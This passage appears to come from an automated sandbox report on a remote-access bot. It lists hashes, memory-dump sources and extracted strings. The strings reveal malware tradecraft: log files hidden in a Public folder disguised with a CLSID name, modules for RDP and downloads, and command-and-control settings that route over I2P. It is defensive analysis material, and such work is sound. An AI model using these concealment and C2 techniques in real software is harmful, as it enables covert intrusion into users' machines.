                                    • String ID: $C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rdpctl.log$Done$P$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(log_cs) failed(gle=%lu)$[E] (%s) -> Log open failed(flog_path=%s)$[I] (%s) -> %s$[I] (%s) -> Log open success(flog_path=%s)$debug_init$log$rdpctl.l$~
                                    • API String ID: 3395718042-1794035234
                                    • Opcode ID: 7ea5a7862861d5ea6c841cfaceadcf6219b2eeffedc7ed65e0db8ba229a4bfac
                                    • Instruction ID: 47a5b3339ff0257f473b8896456802e72b656f04967a63fa6e25ed21d43640bf
                                    • Opcode Fuzzy Hash: 7ea5a7862861d5ea6c841cfaceadcf6219b2eeffedc7ed65e0db8ba229a4bfac
                                    • Instruction Fuzzy Hash: F2512DE0F1C6D791FA129B74EC913B96260AF0B744F54503ACA0DC62B2DEEDAD95C342

                                    Control-flow Graph

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208703505.00007FFB22761000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFB22760000, based on PE: true
                                    • Associated: 0000001D.00000002.2208680037.00007FFB22760000.00000002.00000001.01000000.0000000D.sdmp
                                    • Associated: 0000001D.00000002.2208733335.00007FFB22773000.00000002.00000001.01000000.0000000D.sdmp
                                    • Associated: 0000001D.00000002.2208757421.00007FFB2277C000.00000004.00000001.01000000.0000000D.sdmp
                                    • Associated: 0000001D.00000002.2208788193.00007FFB2277F000.00000004.00000001.01000000.0000000D.sdmp
                                    • Associated: 0000001D.00000002.2208811315.00007FFB22780000.00000008.00000001.01000000.0000000D.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22760000_main.jbxd
                                    Similarity
                                    • API ID: strlen$CountCriticalErrorHandleInitializeLastModuleSectionSpinfopenstrcat
                                    • String ID: $C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\prgmgr.log$Done$P$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(log_cs) failed(gle=%lu)$[E] (%s) -> Log open failed(flog_path=%s)$[I] (%s) -> %s$[I] (%s) -> Log open success(flog_path=%s)$debug_init$log$prgmgr.l$~
                                    • API String ID: 3395718042-2735303109
                                    • Opcode ID: ebf9d58a63554e6c52e0b6df3d98ce9052d5d2b5b3cdbd27a79c7ef099bc9720
                                    • Instruction ID: 8020d66ddfc8914f6f35fa55a2e82b7c4d187e2203083cddf353c0de82685410
                                    • Opcode Fuzzy Hash: ebf9d58a63554e6c52e0b6df3d98ce9052d5d2b5b3cdbd27a79c7ef099bc9720
                                    • Instruction Fuzzy Hash: 3B51E6D0E0C69385FB279735EE806B82250AF0F784F545436D50EC62B6EEEDAD8A8341
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208866783.00007FFB23AB1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFB23AB0000, based on PE: true
                                    • Associated: 0000001D.00000002.2208840934.00007FFB23AB0000.00000002.00000001.01000000.0000000B.sdmp
                                    • Associated: 0000001D.00000002.2208893229.00007FFB23AC0000.00000002.00000001.01000000.0000000B.sdmp
                                    • Associated: 0000001D.00000002.2208920156.00007FFB23AC8000.00000004.00000001.01000000.0000000B.sdmp
                                    • Associated: 0000001D.00000002.2208953322.00007FFB23ACB000.00000004.00000001.01000000.0000000B.sdmp
                                    • Associated: 0000001D.00000002.2208975635.00007FFB23ACC000.00000008.00000001.01000000.0000000B.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb23ab0000_main.jbxd
                                    Similarity
                                    • API ID: strlen$CountCriticalErrorHandleInitializeLastModuleSectionSpinfopenstrcat
                                    • String ID: $C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\evtsrv.log$Done$P$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(log_cs) failed(gle=%lu)$[E] (%s) -> Log open failed(flog_path=%s)$[I] (%s) -> %s$[I] (%s) -> Log open success(flog_path=%s)$debug_init$evtsrv.l$log$~
                                    • API String ID: 3395718042-190452282
                                    • Opcode ID: c05900a8507ee543a62eed4c6a185f04896fe9d0da75e948d3abfafb94edaaae
                                    • Instruction ID: 635da9fb7584a1fb413bdfda998624353fe52ca96ff93cfd146a06660f85a228
                                    • Opcode Fuzzy Hash: c05900a8507ee543a62eed4c6a185f04896fe9d0da75e948d3abfafb94edaaae
                                    • Instruction Fuzzy Hash: 77514CD0A2C7C385FA229B31EC913BC1256AF67744F4C46B3C90D766BADE6DA945C301
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2209181785.00007FFB23B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFB23B00000, based on PE: true
                                    • Associated: 0000001D.00000002.2209162006.00007FFB23B00000.00000002.00000001.01000000.00000009.sdmp
                                    • Associated: 0000001D.00000002.2209208855.00007FFB23B13000.00000004.00000001.01000000.00000009.sdmp
                                    • Associated: 0000001D.00000002.2209231667.00007FFB23B14000.00000002.00000001.01000000.00000009.sdmp
                                    • Associated: 0000001D.00000002.2209254886.00007FFB23B1D000.00000004.00000001.01000000.00000009.sdmp
                                    • Associated: 0000001D.00000002.2209280482.00007FFB23B20000.00000004.00000001.01000000.00000009.sdmp
                                    • Associated: 0000001D.00000002.2209306282.00007FFB23B21000.00000008.00000001.01000000.00000009.sdmp
                                    • Associated: 0000001D.00000002.2209326411.00007FFB23B24000.00000002.00000001.01000000.00000009.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb23b00000_main.jbxd
                                    Similarity
                                    • API ID: strlen$CountCriticalErrorHandleInitializeLastModuleSectionSpinfopenstrcat
                                    • String ID: $C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\cnccli.log$Done$P$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(log_cs) failed(gle=%lu)$[E] (%s) -> Log open failed(flog_path=%s)$[I] (%s) -> %s$[I] (%s) -> Log open success(flog_path=%s)$cnccli.l$debug_init$log$~
                                    • API String ID: 3395718042-315528054
                                    • Opcode ID: dcfddc2b426ac29bdb8cf0f95e9105a01ebd652cce81c2a24819274074492461
                                    • Instruction ID: fea981793bd8296bd15cd467253734b9306e1c9f98eb291e5371454ceaabc360
                                    • Opcode Fuzzy Hash: dcfddc2b426ac29bdb8cf0f95e9105a01ebd652cce81c2a24819274074492461
                                    • Instruction Fuzzy Hash: 94515B98A1C68391F6125F70ECDA3BD9250AF44384F9C40B7C5CD37AA6DE6DBA46C341

                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208390764.00007FFB22701000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFB22700000, based on PE: true
                                    • Associated: 0000001D.00000002.2208361583.00007FFB22700000.00000002.00000001.01000000.00000010.sdmp
                                    • Associated: 0000001D.00000002.2208422394.00007FFB22714000.00000002.00000001.01000000.00000010.sdmp
                                    • Associated: 0000001D.00000002.2208448902.00007FFB2271D000.00000004.00000001.01000000.00000010.sdmp
                                    • Associated: 0000001D.00000002.2208474915.00007FFB22720000.00000004.00000001.01000000.00000010.sdmp
                                    • Associated: 0000001D.00000002.2208502995.00007FFB22721000.00000008.00000001.01000000.00000010.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22700000_main.jbxd
                                    Similarity
                                    • API ID: strlen$CountCriticalErrorHandleInitializeLastModuleSectionSpinfopenstrcat
                                    • String ID: $C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\samctl.log$Done$P$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(log_cs) failed(gle=%lu)$[E] (%s) -> Log open failed(flog_path=%s)$[I] (%s) -> %s$[I] (%s) -> Log open success(flog_path=%s)$debug_init$log$samctl.l$~
                                    • API String ID: 3395718042-1297835036
                                    • Opcode ID: d608998b748734eab2d20801051afb47f70174508fd460ff7f8dc53809c99610
                                    • Instruction ID: 67660d0189d9c20bf0f3969c99a88495b1c3d8ebf59792b589e35f80bd519fe4
                                    • Opcode Fuzzy Hash: d608998b748734eab2d20801051afb47f70174508fd460ff7f8dc53809c99610
                                    • Instruction Fuzzy Hash: FC514FE1A1C6D385FA2A9B30ECA03B85250AF47744F901036D90EE66B5DEECAE5DC701
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2209018844.00007FFB23AD1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFB23AD0000, based on PE: true
                                    • Associated: 0000001D.00000002.2208997687.00007FFB23AD0000.00000002.00000001.01000000.0000000A.sdmp
                                    • Associated: 0000001D.00000002.2209048151.00007FFB23AE2000.00000002.00000001.01000000.0000000A.sdmp
                                    • Associated: 0000001D.00000002.2209071254.00007FFB23AEB000.00000004.00000001.01000000.0000000A.sdmp
                                    • Associated: 0000001D.00000002.2209098898.00007FFB23AEE000.00000004.00000001.01000000.0000000A.sdmp
                                    • Associated: 0000001D.00000002.2209118852.00007FFB23AEF000.00000008.00000001.01000000.0000000A.sdmp
                                    • Associated: 0000001D.00000002.2209139881.00007FFB23AF2000.00000002.00000001.01000000.0000000A.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb23ad0000_main.jbxd
                                    Similarity
                                    • API ID: strlen$CountCriticalErrorHandleInitializeLastModuleSectionSpinfopenstrcat
                                    • String ID: $C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\dwlmgr.log$Done$P$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(log_cs) failed(gle=%lu)$[E] (%s) -> Log open failed(flog_path=%s)$[I] (%s) -> %s$[I] (%s) -> Log open success(flog_path=%s)$debug_init$dwlmgr.l$log$~
                                    • API String ID: 3395718042-2859552336
                                    • Opcode ID: 8eb523f6f635b5c07c8c6666e5b4f78f4833ebcdab95b7191bacb9555ff02cba
                                    • Instruction ID: 1c7fe4009b484da21f512296b99a9d63b81dc11de1d18de66fc8ebf526382f75
                                    • Opcode Fuzzy Hash: 8eb523f6f635b5c07c8c6666e5b4f78f4833ebcdab95b7191bacb9555ff02cba
                                    • Instruction Fuzzy Hash: 08513ED0E1CB9B81FAA39B31EC843BC5255AF4B745F9C40B2C90E266A5DE6CA947C701
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208550084.00007FFB22731000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFB22730000, based on PE: true
                                    • Associated: 0000001D.00000002.2208524670.00007FFB22730000.00000002.00000001.01000000.0000000E.sdmp
                                    • Associated: 0000001D.00000002.2208579475.00007FFB22746000.00000002.00000001.01000000.0000000E.sdmp
                                    • Associated: 0000001D.00000002.2208602997.00007FFB22750000.00000004.00000001.01000000.0000000E.sdmp
                                    • Associated: 0000001D.00000002.2208629839.00007FFB22753000.00000004.00000001.01000000.0000000E.sdmp
                                    • Associated: 0000001D.00000002.2208653105.00007FFB22754000.00000008.00000001.01000000.0000000E.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22730000_main.jbxd
                                    Similarity
                                    • API ID: OpenQueryValuefflushfwrite
                                    • String ID: $ $(key != NULL)$(root != NULL)$(value != NULL)$(value_sz != NULL)$C:/Projects/rdp/bot/codebase/registry.c$NULL$P$P$[D] (%s) -> Done(root=0x%p,key=%s,param=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu)$[E] (%s) -> RegQueryValueA failed(root=0x%p,key=%s,param=%s,res=%lu)$registry_get_value
                                    • API String ID: 1980715187-3890537267
                                    • Opcode ID: 544a69305bef499ce7d2453c7d2b6ff2912d1efc63b2779777ded2693e20a23b
                                    • Instruction ID: 866d0b03175d2daf718e1d33e8774a12558d654d5fb3d249be9d8cba3eef3778
                                    • Opcode Fuzzy Hash: 544a69305bef499ce7d2453c7d2b6ff2912d1efc63b2779777ded2693e20a23b
                                    • Instruction Fuzzy Hash: DBA14DE1A0C7CB81FA269720EC403B93261AF0B755E540132D91ED66B1EEEDAD89C303
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208703505.00007FFB22761000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFB22760000, based on PE: true
                                    • Associated: 0000001D.00000002.2208680037.00007FFB22760000.00000002.00000001.01000000.0000000D.sdmp
                                    • Associated: 0000001D.00000002.2208733335.00007FFB22773000.00000002.00000001.01000000.0000000D.sdmp
                                    • Associated: 0000001D.00000002.2208757421.00007FFB2277C000.00000004.00000001.01000000.0000000D.sdmp
                                    • Associated: 0000001D.00000002.2208788193.00007FFB2277F000.00000004.00000001.01000000.0000000D.sdmp
                                    • Associated: 0000001D.00000002.2208811315.00007FFB22780000.00000008.00000001.01000000.0000000D.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22760000_main.jbxd
                                    Similarity
                                    • API ID: OpenQueryValuefflushfwrite
                                    • String ID: $ $(key != NULL)$(root != NULL)$(value != NULL)$(value_sz != NULL)$C:/Projects/rdp/bot/codebase/registry.c$NULL$P$P$[D] (%s) -> Done(root=0x%p,key=%s,param=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu)$[E] (%s) -> RegQueryValueA failed(root=0x%p,key=%s,param=%s,res=%lu)$registry_get_value
                                    • API String ID: 1980715187-3890537267
                                    • Opcode ID: 2d9d8e01c26293ebd5e956b6b79eb68f4cf47b494667fc9fb6c32eda91e6c0a0
                                    • Instruction ID: c384a2be7d8938c709cc7ceb61c80af1ece2912025c8933a4f28172b2441f35d
                                    • Opcode Fuzzy Hash: 2d9d8e01c26293ebd5e956b6b79eb68f4cf47b494667fc9fb6c32eda91e6c0a0
                                    • Instruction Fuzzy Hash: 5AA11FE1D0C7CB91F7229761EE403782254AF0AB58E544132D92ECA7B1EEEDED85C742
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208866783.00007FFB23AB1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFB23AB0000, based on PE: true
                                    • Associated: 0000001D.00000002.2208840934.00007FFB23AB0000.00000002.00000001.01000000.0000000B.sdmp
                                    • Associated: 0000001D.00000002.2208893229.00007FFB23AC0000.00000002.00000001.01000000.0000000B.sdmp
                                    • Associated: 0000001D.00000002.2208920156.00007FFB23AC8000.00000004.00000001.01000000.0000000B.sdmp
                                    • Associated: 0000001D.00000002.2208953322.00007FFB23ACB000.00000004.00000001.01000000.0000000B.sdmp
                                    • Associated: 0000001D.00000002.2208975635.00007FFB23ACC000.00000008.00000001.01000000.0000000B.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb23ab0000_main.jbxd
                                    Similarity
                                    • API ID: OpenQueryValuefflushfwrite
                                    • String ID: $ $(key != NULL)$(root != NULL)$(value != NULL)$(value_sz != NULL)$C:/Projects/rdp/bot/codebase/registry.c$NULL$P$P$[D] (%s) -> Done(root=0x%p,key=%s,param=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu)$[E] (%s) -> RegQueryValueA failed(root=0x%p,key=%s,param=%s,res=%lu)$registry_get_value
                                    • API String ID: 1980715187-3890537267
                                    • Opcode ID: 84e1102881e14aa1f1fe1744a6ea1b08f4cca0e5c6733abdbc1240c36314e2db
                                    • Instruction ID: 1e8c7863dfd997bafbcd3fa3e2de626256f487dda981ff38d12b8c87bb75b468
                                    • Opcode Fuzzy Hash: 84e1102881e14aa1f1fe1744a6ea1b08f4cca0e5c6733abdbc1240c36314e2db
                                    • Instruction Fuzzy Hash: FFA167E0A0C7CB81F6639731EC403BC63627F67784E4C02B6D91E366A9EE6DA945C305
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2209181785.00007FFB23B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFB23B00000, based on PE: true
                                    • Associated: 0000001D.00000002.2209162006.00007FFB23B00000.00000002.00000001.01000000.00000009.sdmp
                                    • Associated: 0000001D.00000002.2209208855.00007FFB23B13000.00000004.00000001.01000000.00000009.sdmp
                                    • Associated: 0000001D.00000002.2209231667.00007FFB23B14000.00000002.00000001.01000000.00000009.sdmp
                                    • Associated: 0000001D.00000002.2209254886.00007FFB23B1D000.00000004.00000001.01000000.00000009.sdmp
                                    • Associated: 0000001D.00000002.2209280482.00007FFB23B20000.00000004.00000001.01000000.00000009.sdmp
                                    • Associated: 0000001D.00000002.2209306282.00007FFB23B21000.00000008.00000001.01000000.00000009.sdmp
                                    • Associated: 0000001D.00000002.2209326411.00007FFB23B24000.00000002.00000001.01000000.00000009.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb23b00000_main.jbxd
                                    Similarity
                                    • API ID: OpenQueryValuefflushfwrite
                                    • String ID: $ $(key != NULL)$(root != NULL)$(value != NULL)$(value_sz != NULL)$C:/Projects/rdp/bot/codebase/registry.c$NULL$P$P$[D] (%s) -> Done(root=0x%p,key=%s,param=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu)$[E] (%s) -> RegQueryValueA failed(root=0x%p,key=%s,param=%s,res=%lu)$registry_get_value
                                    • API String ID: 1980715187-3890537267
                                    • Opcode ID: 7d3cf77ab48ebe66b309a578ee114a658df6942dc3b7a330a2a0c28baeca7cb0
                                    • Instruction ID: 0476678b8ab82e0f5542852bd137b3eb0a8fce82f017f2c49941c158dfc61d08
                                    • Opcode Fuzzy Hash: 7d3cf77ab48ebe66b309a578ee114a658df6942dc3b7a330a2a0c28baeca7cb0
                                    • Instruction Fuzzy Hash: 92A13E9990C7CB85FA22AF60EC8837C72506F44744F4C41BBC9CD666E1EE6EA985C342
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208390764.00007FFB22701000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFB22700000, based on PE: true
                                    • Associated: 0000001D.00000002.2208361583.00007FFB22700000.00000002.00000001.01000000.00000010.sdmp
                                    • Associated: 0000001D.00000002.2208422394.00007FFB22714000.00000002.00000001.01000000.00000010.sdmp
                                    • Associated: 0000001D.00000002.2208448902.00007FFB2271D000.00000004.00000001.01000000.00000010.sdmp
                                    • Associated: 0000001D.00000002.2208474915.00007FFB22720000.00000004.00000001.01000000.00000010.sdmp
                                    • Associated: 0000001D.00000002.2208502995.00007FFB22721000.00000008.00000001.01000000.00000010.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22700000_main.jbxd
                                    Similarity
                                    • API ID: OpenQueryValuefflushfwrite
                                    • String ID: $ $(key != NULL)$(root != NULL)$(value != NULL)$(value_sz != NULL)$C:/Projects/rdp/bot/codebase/registry.c$NULL$P$P$[D] (%s) -> Done(root=0x%p,key=%s,param=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu)$[E] (%s) -> RegQueryValueA failed(root=0x%p,key=%s,param=%s,res=%lu)$registry_get_value
                                    • API String ID: 1980715187-3890537267
                                    • Opcode ID: 7310aad736842cb7b11f3b6cd13ab58d5f6879207f68ca259b3a597a8c6d5c50
                                    • Instruction ID: f474ba838bab2fd74700adb01f48714ab4f32fcef60f72f6d68f825270014f33
                                    • Opcode Fuzzy Hash: 7310aad736842cb7b11f3b6cd13ab58d5f6879207f68ca259b3a597a8c6d5c50
                                    • Instruction Fuzzy Hash: 14A1FEE0D0C7CB95F66A9B60EC413792254AF07748E540132D91ECB7B5EEEDAE8D8302
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2209018844.00007FFB23AD1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFB23AD0000, based on PE: true
                                    • Associated: 0000001D.00000002.2208997687.00007FFB23AD0000.00000002.00000001.01000000.0000000A.sdmp
                                    • Associated: 0000001D.00000002.2209048151.00007FFB23AE2000.00000002.00000001.01000000.0000000A.sdmp
                                    • Associated: 0000001D.00000002.2209071254.00007FFB23AEB000.00000004.00000001.01000000.0000000A.sdmp
                                    • Associated: 0000001D.00000002.2209098898.00007FFB23AEE000.00000004.00000001.01000000.0000000A.sdmp
                                    • Associated: 0000001D.00000002.2209118852.00007FFB23AEF000.00000008.00000001.01000000.0000000A.sdmp
                                    • Associated: 0000001D.00000002.2209139881.00007FFB23AF2000.00000002.00000001.01000000.0000000A.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb23ad0000_main.jbxd
                                    Similarity
                                    • API ID: OpenQueryValuefflushfwrite
                                    • String ID: $ $(key != NULL)$(root != NULL)$(value != NULL)$(value_sz != NULL)$C:/Projects/rdp/bot/codebase/registry.c$NULL$P$P$[D] (%s) -> Done(root=0x%p,key=%s,param=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu)$[E] (%s) -> RegQueryValueA failed(root=0x%p,key=%s,param=%s,res=%lu)$registry_get_value
                                    • API String ID: 1980715187-3890537267
                                    • Opcode ID: 3254d7c58e01438740999ba0d3a834f1f6246f3ea7ebcb3f0694f57f6c045d34
                                    • Instruction ID: 23a1c35ea14033a49e706cc58d67a7bbce255c2259de0e8cc271fb7c37566a10
                                    • Opcode Fuzzy Hash: 3254d7c58e01438740999ba0d3a834f1f6246f3ea7ebcb3f0694f57f6c045d34
                                    • Instruction Fuzzy Hash: FCA162E090DBCF81F6629724EC4477D2250AF06744F5C06B2DA5E277E6EE6DE986C302
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2209181785.00007FFB23B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFB23B00000, based on PE: true
                                    • Associated: 0000001D.00000002.2209162006.00007FFB23B00000.00000002.00000001.01000000.00000009.sdmp
                                    • Associated: 0000001D.00000002.2209208855.00007FFB23B13000.00000004.00000001.01000000.00000009.sdmp
                                    • Associated: 0000001D.00000002.2209231667.00007FFB23B14000.00000002.00000001.01000000.00000009.sdmp
                                    • Associated: 0000001D.00000002.2209254886.00007FFB23B1D000.00000004.00000001.01000000.00000009.sdmp
                                    • Associated: 0000001D.00000002.2209280482.00007FFB23B20000.00000004.00000001.01000000.00000009.sdmp
                                    • Associated: 0000001D.00000002.2209306282.00007FFB23B21000.00000008.00000001.01000000.00000009.sdmp
                                    • Associated: 0000001D.00000002.2209326411.00007FFB23B24000.00000002.00000001.01000000.00000009.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb23b00000_main.jbxd
                                    Similarity
                                    • API ID: CreateErrorLastThread
                                    • String ID: $Done$P$[E] (%s) -> CreateThread(%s) failed(gle=%lu)$[E] (%s) -> Failed(err=%08x)$[I] (%s) -> %s$[I] (%s) -> CreateThread(%s) done$cnc_init$cnccli$i2p_addr$i2p_sam3_timeo$i2p_try_num$routine_rx$server_host$server_port$server_timeo$~
                                    • API String ID: 1689873465-2891999747
                                    • Opcode ID: 9440ff41f7ffa46fdab4ccb718da3e43072494cb815ec319ec81a3114deaf31f
                                    • Instruction ID: 05e7a6d8e46911bb4bdc7557265e6f15effdae08c28618da0c8dde28ed417589
                                    • Opcode Fuzzy Hash: 9440ff41f7ffa46fdab4ccb718da3e43072494cb815ec319ec81a3114deaf31f
                                    • Instruction Fuzzy Hash: 0B91FFE8A0C7C355FA629F34ECCC3BD2690AB44365F5802B5C4DDAA2E5EF6CA549C341
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2206844500.00007FF7AABD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7AABD0000, based on PE: true
                                    • Associated: 0000001D.00000002.2206820722.00007FF7AABD0000.00000002.00000001.01000000.00000008.sdmp
                                    • Associated: 0000001D.00000002.2206867245.00007FF7AABE0000.00000002.00000001.01000000.00000008.sdmp
                                    • Associated: 0000001D.00000002.2206894106.00007FF7AABE8000.00000004.00000001.01000000.00000008.sdmp
                                    • Associated: 0000001D.00000002.2206894106.00007FF7AABEA000.00000004.00000001.01000000.00000008.sdmp
                                    • Associated: 0000001D.00000002.2206941983.00007FF7AABEE000.00000002.00000001.01000000.00000008.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ff7aabd0000_main.jbxd
                                    Similarity
                                    • API ID: _errno$fclosefopenfwrite
                                    • String ID: (mode != NULL)$(path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,mode=%s,err=%08x)$[E] (%s) -> fopen failed(path=%s,mode=%s,errno=%d)$[E] (%s) -> fwrite failed(path=%s,mode=%s,errno=%d)$[I] (%s) -> Done(path=%s,mode=%s,buf_sz=%llu)$fs_file_write
                                    • API String ID: 608220805-544371937
                                    • Opcode ID: af7c7cab041d3b851780146d5672c8fe18e1dd2933ac2adfc5023734d97ee3c1
                                    • Instruction ID: 3d532d06a7d365640285ce5d987b256a466569cb4bd57814e44e2818c28c4611
                                    • Opcode Fuzzy Hash: af7c7cab041d3b851780146d5672c8fe18e1dd2933ac2adfc5023734d97ee3c1
                                    • Instruction Fuzzy Hash: 65519E21A0B683D6FA20BB54E9402F8E255BF64794FDA01B2D90D476B4DF3CF9478320
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208703505.00007FFB22761000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFB22760000, based on PE: true
                                    • Associated: 0000001D.00000002.2208680037.00007FFB22760000.00000002.00000001.01000000.0000000D.sdmp
                                    • Associated: 0000001D.00000002.2208733335.00007FFB22773000.00000002.00000001.01000000.0000000D.sdmp
                                    • Associated: 0000001D.00000002.2208757421.00007FFB2277C000.00000004.00000001.01000000.0000000D.sdmp
                                    • Associated: 0000001D.00000002.2208788193.00007FFB2277F000.00000004.00000001.01000000.0000000D.sdmp
                                    • Associated: 0000001D.00000002.2208811315.00007FFB22780000.00000008.00000001.01000000.0000000D.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22760000_main.jbxd
                                    Similarity
                                    • API ID: strlen$CreateDirectoryErrorLast$strcpy
                                    • String ID: (path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> CreateDirectoryA failed(path=%s,recursive=%d,gle=%lu)$[E] (%s) -> CreateDirectoryA failed(path=%s,recursive=%d,ptr=%s,gle=%lu)$[E] (%s) -> Failed(path=%s,recursive=%d,err=%08x)$[I] (%s) -> Done(path=%s,recursive=%d)$fs_dir_create
                                    • API String ID: 1104438493-1059260517
                                    • Opcode ID: 40dbb72f32e1da1f63c3337725ccdb864fd4bb97a0da6b954f206b1e6fe925d8
                                    • Instruction ID: dec5d0b6a4f3d11abe6852c4a66e088c5f7ad6ad88f3a3f08687b1ea11d9524a
                                    • Opcode Fuzzy Hash: 40dbb72f32e1da1f63c3337725ccdb864fd4bb97a0da6b954f206b1e6fe925d8
                                    • Instruction Fuzzy Hash: 9F716BA1E0C6C386FB265B35EE40BB96250AB4F744F941132DA0EC66F5DEADEC45C701
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2209181785.00007FFB23B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFB23B00000, based on PE: true
                                    • Associated: 0000001D.00000002.2209162006.00007FFB23B00000.00000002.00000001.01000000.00000009.sdmp
                                    • Associated: 0000001D.00000002.2209208855.00007FFB23B13000.00000004.00000001.01000000.00000009.sdmp
                                    • Associated: 0000001D.00000002.2209231667.00007FFB23B14000.00000002.00000001.01000000.00000009.sdmp
                                    • Associated: 0000001D.00000002.2209254886.00007FFB23B1D000.00000004.00000001.01000000.00000009.sdmp
                                    • Associated: 0000001D.00000002.2209280482.00007FFB23B20000.00000004.00000001.01000000.00000009.sdmp
                                    • Associated: 0000001D.00000002.2209306282.00007FFB23B21000.00000008.00000001.01000000.00000009.sdmp
                                    • Associated: 0000001D.00000002.2209326411.00007FFB23B24000.00000002.00000001.01000000.00000009.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb23b00000_main.jbxd
                                    Similarity
                                    • API ID: strlen$CreateDirectoryErrorLast$strcpy
                                    • String ID: (path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> CreateDirectoryA failed(path=%s,recursive=%d,gle=%lu)$[E] (%s) -> CreateDirectoryA failed(path=%s,recursive=%d,ptr=%s,gle=%lu)$[E] (%s) -> Failed(path=%s,recursive=%d,err=%08x)$[I] (%s) -> Done(path=%s,recursive=%d)$fs_dir_create
